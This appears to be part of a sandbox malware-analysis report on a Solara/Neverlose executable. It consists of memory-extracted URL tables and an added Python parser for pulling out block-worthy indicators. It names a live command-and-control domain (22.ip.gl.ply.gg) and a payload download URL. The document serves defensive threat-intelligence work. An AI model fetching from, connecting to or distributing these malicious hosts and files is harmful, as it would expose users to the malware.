https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip | false | Avira URL Cloud: safe | unknown
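The raw text export of these tables runs the URL, its list of memory-dump sources and the Malicious flag together into one string, which makes the single real C2 indicator in this report (22.ip.gl.ply.gg, the only domain marked malicious) easy to lose among dozens of harmless GitHub CDN URLs pulled from SolaraBootstrapper.exe's heap. The following is an added example, not part of the Joe Sandbox report or of its tooling, that parses the domain table and the Name/Source URL rows back into records and extracts the indicators worth blocking. Its assumptions are labelled in the code: the process-name list is taken from this report's process tree, the meaning of the memory-dump id fields (process number, region base, Win32 page protection and memory type) is not documented on the page and is inferred from the values, and a trailing quote on a URL is treated as string-extraction residue.

```python
import html
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Process names from this report's process tree (assumption: extend for other reports).
# The text export fuses the Name and Source cells, so the URL is taken to end where the
# first "<process>, <dump-id>" pair begins; "nuget.exe" followed by "powershell.exe" still splits right.
PROCESS_NAMES = ("Neverlose.exe", "Solara.exe", "SolaraBootstrapper.exe", "powershell.exe")
DUMP_RE = re.compile(
    r"(" + "|".join(re.escape(p) for p in PROCESS_NAMES) + r"), "
    r"([0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.[0-9A-F]{16}(?:\.[0-9A-F]{8}){4}\.sdmp)")
FLAGS_RE = re.compile(r"^(true|false)(true|false)(\S+)$")

# Assumption (the page does not document the dump-id layout): field 1 is the process
# number, field 4 the region base, fields 5 and 7 the Win32 page-protection and
# memory-type values. Unrecognised values are kept as the raw hex string.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

Dump = namedtuple("Dump", "process proc_index base protect mem_type")
DomainRow = namedtuple("DomainRow", "name ip active malicious reputation")


@dataclass
class UrlRow:
    url: str
    dumps: list
    malicious: bool
    verdicts: list = field(default_factory=list)  # (scanner, label or detection ratio)
    reputation: str = ""


def parse_dump(process, dump_id):
    f = dump_id[:-len(".sdmp")].split(".")
    return Dump(process, int(f[0], 16), int(f[3], 16),
                PAGE_PROTECT.get(int(f[4], 16), f[4]), MEM_TYPE.get(int(f[6], 16), f[6]))


def parse_verdict(text):
    # "1%, Virustotal, Browse" -> ("Virustotal", "1%"); "Avira URL Cloud: safe" -> ("Avira URL Cloud", "safe")
    if ": " in text:
        scanner, label = text.split(": ", 1)
        return scanner.strip(), label.strip()
    ratio, scanner = (p.strip() for p in text.split(",")[:2])
    return scanner, ratio


def parse_domain_table(text):
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    rows = []
    for name, ip, flags in zip(lines[0::3], lines[1::3], lines[2::3]):
        active, malicious, rep = FLAGS_RE.match(flags).groups()
        rows.append(DomainRow(name, ip, active == "true", malicious == "true", rep))
    return rows


def parse_url_table(text):
    rows = []
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if line.startswith("•"):
            rows[-1].verdicts.append(parse_verdict(line[1:]))
            continue
        m = DUMP_RE.search(line)
        if m is None:                 # a bare reputation line closes the current row
            rows[-1].reputation = line
            continue
        tail = line[m.start():]
        flag = re.search(r"(true|false)$", tail).group(1)
        url = html.unescape(line[:m.start()]).rstrip('"')  # trailing &quot; is extraction residue
        dumps = [parse_dump(p, d) for p, d in DUMP_RE.findall(tail[:-len(flag)])]
        rows.append(UrlRow(url, dumps, flag == "true"))
    return rows


def iocs(domains, urls):
    """Indicators worth blocking: domains the sandbox marked malicious plus URLs that
    any scanner labelled malware. The benign GitHub CDN noise drops out."""
    out = [(d.name, d.ip) for d in domains if d.malicious]
    out += [(u.url, None) for u in urls
            if u.malicious or any(label == "malware" for _, label in u.verdicts)]
    return out


# Constructed sample: rows copied from this report's tables, with source lists shortened.
DOMAIN_ROWS = "22.ip.gl.ply.gg\n147.185.221.22\ntruetrueunknown\ngithub.com\n140.82.121.4\ntruefalseunknown\n"
URL_ROWS = """
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip&quot;SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
• 1%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1708078820.00000000060C9000.00000004.00000800.00020000.00000000.sdmpfalse
• URL Reputation: safe
unknown
http://www.enigmaprotector.com/Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpfalse
• Avira URL Cloud: safe
unknown
"""

if __name__ == "__main__":
    urls = parse_url_table(URL_ROWS)
    print(iocs(parse_domain_table(DOMAIN_ROWS), urls), [(r.url, r.dumps) for r in urls])
```

Under the stated assumption about the dump-id fields, the decoded regions also say something about where a string came from: the GitHub URLs sit in PAGE_READWRITE / MEM_PRIVATE regions of SolaraBootstrapper.exe (managed heap strings), whereas the enigmaprotector.com URL is in a PAGE_EXECUTE_READWRITE / MEM_IMAGE region of Neverlose.exe, consistent with the "overwrites its own PE header" unpacking signatures listed for the sample.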
Name | Source | Malicious | Antivirus Detection | Reputation
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/solutions/industries/financial-services | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_ | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.com/solutions/devsecops | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85 | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/customer-stories | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.com/readme | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/element-registry-ee3b4c180fee.js | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/features/code-review | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/features | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/features/issues | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://user-images.githubusercontent.com/ | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js- | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_ | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://skills.github.com | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/solutions/industries/manufacturing | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip" | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://api.github.com/_private/browser/stats | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_ | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1708078820.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1873584903.000001B390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2035739099.00000243405D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2242695799.000002DC7232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_gith | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.com/solutions/devops | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_ | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.js | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2914277285.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC622C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499A41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.githubassets.com/assets/primer-9f7b2e63c497.css | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_ | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/te | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000001.00000002.1705141692.000000000584A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1705141692.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://crl.mic | powershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://docs.github.com/get-started/accessibility/keyboard-shortcuts | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1 | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/features/packages | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/ui_packages_updatable-content_upd | SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://resources.github.com/learn/pathways | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j | SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
